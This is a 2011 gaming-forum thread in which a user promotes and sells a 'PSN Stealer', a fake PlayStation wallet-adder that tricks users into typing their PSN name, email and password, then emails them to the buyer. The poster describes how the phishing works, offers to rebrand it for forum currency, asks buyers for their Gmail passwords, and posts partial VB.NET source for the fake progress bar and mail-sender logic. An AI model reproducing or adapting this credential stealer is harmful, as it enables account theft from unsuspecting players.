Post: PSN Stealer Version 1.0
04-02-2011, 10:45 PM #1
Pichu
RIP PICHU.
(adsbygoogle = window.adsbygoogle || []).push({}); Please Lock This Thread!

Application now for sale here!

You must login or register to view this content.
(adsbygoogle = window.adsbygoogle || []).push({});
04-03-2011, 05:34 PM #11
Pichu
RIP PICHU.
Look, if you just here to boost your post count and say it is a RAT without constructive reasoning as to why you think it is, then please do yourself and NGU a favor and bitch slap yourself in the face.

I wrote this application up, it isn't hard to make these. I've worked with Visual Basic for a few months now and when you really think about it, it is very simple coding.

-----

Now I have received a couple of PM's from people requesting to see the source code to verify that it is not a RAT or any of that crap. I will not give you the source code. I will offer you this much.

You must login or register to view this content.

------

All that I have to do is change email as to where the information is sent off to.

Example,

[email][email protected][/email]

When user types in there information, the information is then sent to [email][email protected][/email].

I can change Example to [email][email protected][/email] and then it will no longer be mailed to [email][email protected][/email], it will be mailed to [email][email protected][/email].

Very simple.

--------

Next person who posts RAT or something like that I will report you for spamming, because 1 you have no proof. 2 your just boosting your post count. 3 that is spam because you have no constructive reasoning.

---------- Post added at 10:34 AM ---------- Previous post was at 10:33 AM ----------

Originally posted by jobush50 View Post
its fake lmao


No shit, it says Fake Application... Not Happy or Sad

It doesn't change your Wallet Account Value, it just sends the information to your email address of the users account info.

It's basically a Email Sender.
04-03-2011, 05:42 PM #12
iNikush
I'm back from the dead
Originally posted by Disabled View Post
Next Person Who Writes "RAT" or something along those lines will be reported unless they provide constructive reasoning as to why they believe their guess is correct. ... I'm getting ready to request this thread to be closed for the reason that I am being accused of trying to "Scam" and "RAT" members.

------------

I made this in about 45 minutes, (Mostly the design and getting it to send the information to the email address nicely).

Basically, its a fake Wallet Adder, the user loads the applications, connects to the PSN server using a Proxy (Of course its all fake) and then type in their PSN, Email Address Associated with it, and password. They then choose the value they want added and then press accept. Once they press accept all information entered is sent to your email. Right now I have it setup for my email address.

If you wish to have me set it up for your email address, (Only G Mail Right now), I can do so for 5k VBux.

I know it looks simple, and I know how to make it extremely advance looking, but I don't feel like opening Photoshop and creating all the backgrounds and back colors and clipping audio to make it feel and seem like a actual hack program. Maybe another time.

---------

5k VBux and I'll do it for you. Other than that, I'm just showing it off. Which is why I put it here.

--------

Images

You must login or register to view this content.
You must login or register to view this content.
You must login or register to view this content.
You must login or register to view this content.
You must login or register to view this content.
You must login or register to view this content.
You must login or register to view this content.

--------

There you go. Just quote this or send me a PM and I will do it for you for 5k Vbux. If you do want it done though, I will require a email that is GMail. I will also require the password to it.

If you don't trust me then please don't bother asking me. This process will take about 5 minutes to add, as I have to load the application again, enter the info, and make sure that it works properly for your email address.

---------

BYE BYE!


sorry but is this not made by one of premium members and if this is same one you better have permission to use this. btw it would be a keyloger of sorts if this is his program and how would someone know you put a rat btw if your smart they wouldnt know
04-03-2011, 05:47 PM #13
Pichu
RIP PICHU.
Originally posted by jobush50 View Post
its fake lmao


Originally posted by XxBlackBeard View Post
sorry but is this not made by one of premium members and if this is same one you better have permission to use this. btw it would be a keyloger of sorts if this is his program and how would someone know you put a rat btw if your smart they wouldnt know


1) I don't have premium, feel free to buy me some Happy
2) I don't need anyones permission but mine since I wrote this application myself.
3) Yes I understand how RAT works and that no one would know, but I don't have the software currently to even install a keylogger or RAT into my applications and I don't really feel like messing with that stuff again as last time I infected my computer and couldn't get it off like a big dumb retard.
4) I'll never ever give someone a Keylogger or a RAT on NGU.

-----

Can you send me a picture of what the guy in Premium made, because I highly doubt that my design is going to be the exact same design that he made.
04-03-2011, 05:54 PM #14
<Jimbo>
</Jimbo>
Simple, just give us the source code... or at least screen snap a segment! Then you will be thanked! =D

Originally posted by Disabled View Post
1) I don't have premium, feel free to buy me some Happy
2) I don't need anyones permission but mine since I wrote this application myself.
3) Yes I understand how RAT works and that no one would know, but I don't have the software currently to even install a keylogger or RAT into my applications and I don't really feel like messing with that stuff again as last time I infected my computer and couldn't get it off like a big dumb retard.
4) I'll never ever give someone a Keylogger or a RAT on NGU.

-----

Can you send me a picture of what the guy in Premium made, because I highly doubt that my design is going to be the exact same design that he made.
04-03-2011, 05:58 PM #15
Pichu
RIP PICHU.
Originally posted by 123tonka View Post
Simple, just give us the source code... or at least screen snap a segment! Then you will be thanked! =D


You must login or register to view this content.

I sort of did, look up a few posts.

:/

    Imports System.Net.Mail
Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub

Private Sub ToolStripButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ToolStripButton1.Click
ToolStripProgressBar1.Value = 0
Timer1.Start()
ToolStripProgressBar1.Visible = True
ToolStripStatusLabel1.Text = "Connection Being Established Please Wait"
End Sub

Private Sub ToolStripButton2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ToolStripButton2.Click
ToolStripButton1.Visible = True
ToolStripButton2.Visible = False
ToolStripProgressBar1.Visible = False
ToolStripStatusLabel1.Text = "Connection Error 8-71A9E"
Button1.Enabled = False
End Sub

Private Sub ToolStripStatusLabel1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ToolStripStatusLabel1.Click

End Sub

Private Sub ToolStripButton3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs)

End Sub

Private Sub ToolStripProgressBar1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ToolStripProgressBar1.Click

End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
ToolStripProgressBar1.Increment(1)
If ToolStripProgressBar1.Value = ToolStripProgressBar1.Maximum Then
ToolStripStatusLabel1.Text = "Proxy Connection Established"
ToolStripProgressBar1.Visible = False
ToolStripButton1.Visible = False
ToolStripButton2.Visible = True
Button1.Enabled = True
Timer1.Stop()
End If
End Sub

Private Sub TextBox1_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox1.TextChanged

End Sub

Private Sub TextBox2_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox2.TextChanged

End Sub

Private Sub TextBox3_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox3.TextChanged

End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox2.Text = "" Or TextBox3.Text = "" Or TextBox1.Text = "" Or TextBox2.Text = "Type Email Adress Associated With Your PSN Here" Or TextBox3.Text = "Type Password To Your PSN Here - Required For App To Work" Or TextBox1.Text = "Type Playstation Name Here" Then
MsgBox("An Error Occured, Please verify that your PSN, Email, and or Password is correct!", MsgBoxStyle.Critical, "Send Failed")
Else
Try
Dim message As New MailMessage
Dim smtp As New SmtpClient
message.To.Add(TextBox4.Text)


That is most of my applications code.

What is left of it is is the rest of the email sender.
04-03-2011, 06:00 PM #16
Originally posted by Disabled View Post
Next Person Who Writes "RAT" or something along those lines will be reported unless they provide constructive reasoning as to why they believe their guess is correct. ... I'm getting ready to request this thread to be closed for the reason that I am being accused of trying to "Scam" and "RAT" members.

------------

I made this in about 45 minutes, (Mostly the design and getting it to send the information to the email address nicely).

Basically, its a fake Wallet Adder, the user loads the applications, connects to the PSN server using a Proxy (Of course its all fake) and then type in their PSN, Email Address Associated with it, and password. They then choose the value they want added and then press accept. Once they press accept all information entered is sent to your email. Right now I have it setup for my email address.

If you wish to have me set it up for your email address, (Only G Mail Right now), I can do so for 5k VBux.

I know it looks simple, and I know how to make it extremely advance looking, but I don't feel like opening Photoshop and creating all the backgrounds and back colors and clipping audio to make it feel and seem like a actual hack program. Maybe another time.

---------

5k VBux and I'll do it for you. Other than that, I'm just showing it off. Which is why I put it here.

--------

Images

You must login or register to view this content.
You must login or register to view this content.
You must login or register to view this content.
You must login or register to view this content.
You must login or register to view this content.
You must login or register to view this content.
You must login or register to view this content.

--------

There you go. Just quote this or send me a PM and I will do it for you for 5k Vbux. If you do want it done though, I will require a email that is GMail. I will also require the password to it.

If you don't trust me then please don't bother asking me. This process will take about 5 minutes to add, as I have to load the application again, enter the info, and make sure that it works properly for your email address.

---------

BYE BYE!


10k vBux to link it to my E-MAIL?
04-03-2011, 06:02 PM #17
viralhysteria
74261700027
Hmm, interesting post bro
04-03-2011, 06:02 PM #18
Pichu
RIP PICHU.
Originally posted by nummpty View Post
10k vBux to link it to my E-MAIL?


Sure, give me email and password info, I'll change it up for you and then send it to you. You can send me the VBux after you receive the application if you choose.

PM It, forgot to add that.
04-03-2011, 06:05 PM #19
Originally posted by Disabled View Post
Sure, give me email and password info, I'll change it up for you and then send it to you. You can send me the VBux after you receive the application if you choose.

PM It, forgot to add that.


kk 2sec i gotta go make a gmail account mines is hotmail atm :y:

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo